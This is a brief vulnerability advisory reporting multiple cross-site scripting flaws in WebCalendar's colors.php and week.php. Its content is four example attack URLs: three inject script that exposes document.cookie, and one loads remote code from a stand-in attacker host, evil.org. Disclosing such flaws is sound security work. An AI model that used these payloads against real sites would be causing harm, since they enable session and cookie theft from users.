WebCalendar Multiple Cross-Site Scripting Vulnerabilities

WebCalendar Multiple Cross-Site Scripting Vulnerabilities

The following examples have been provided:

http://www.example.com/webcalendar/colors.php?color=</script><script>alert(document.cookie)</script>
http://www.example.com/webcalendar/week.php?user="><script>alert(document.cookie)</script>
http://www.example.com/webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>
http://www.example.com/webcalendar/week.php?eventinfo=<script src=http://www.evil.org/evilcode.js</script>